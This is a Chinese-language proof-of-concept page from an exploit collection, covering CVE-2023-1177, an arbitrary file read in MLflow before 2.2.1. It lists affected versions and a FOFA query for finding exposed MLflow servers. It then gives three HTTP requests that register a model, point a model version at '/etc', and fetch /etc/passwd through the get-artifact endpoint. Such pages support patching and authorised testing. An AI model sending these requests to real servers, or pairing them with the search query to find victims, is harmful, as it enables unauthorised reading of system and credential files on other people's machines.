Awesome-POC/Web应用漏洞/MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177.md
2023-04-17 10:09:40 +08:00

51 lines
1.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177
## 漏洞描述
使用 MLflow 模型注册表托管 MLflow 开源项目的用户 mlflow server或者 mlflow ui使用早于 MLflow 2.2.1 的 MLflow 版本的命令如果不限制谁可以查询其服务器(例如,通过使用云 VPC、入站请求的 IP 白名单或身份验证 /授权中间件)。
此问题仅影响运行 mlflow server和 mlflow ui命令。 不使用的集成 mlflow server或者 mlflow ui不受影响 例如Azure Machine Learning 上的 Databricks Managed MLflow 产品和 MLflow 不使用这些命令,并且不会以任何方式受到这些漏洞的影响。
## 漏洞影响
```
MLflow < 2.2.1
```
## FOFA
```
app.name="MLflow"
```
## 漏洞复现
登陆页面
![image-20230417093814404](images/image-20230417093814404.png)
验证POC
```
POST /ajax-api/2.0/mlflow/registered-models/create
Content-Type: application/json
{"name": "testfile"}
```
![image-20230417093836998](images/image-20230417093836998.png)
```
POST /ajax-api/2.0/mlflow/model-versions/create
Content-Type: application/json
{"name": "testfile", "source": "/etc"}
```
![image-20230417093851779](images/image-20230417093851779.png)
```
/model-versions/get-artifact?path=passwd&name=testfile&version=1
```
![image-20230417093907298](images/image-20230417093907298.png)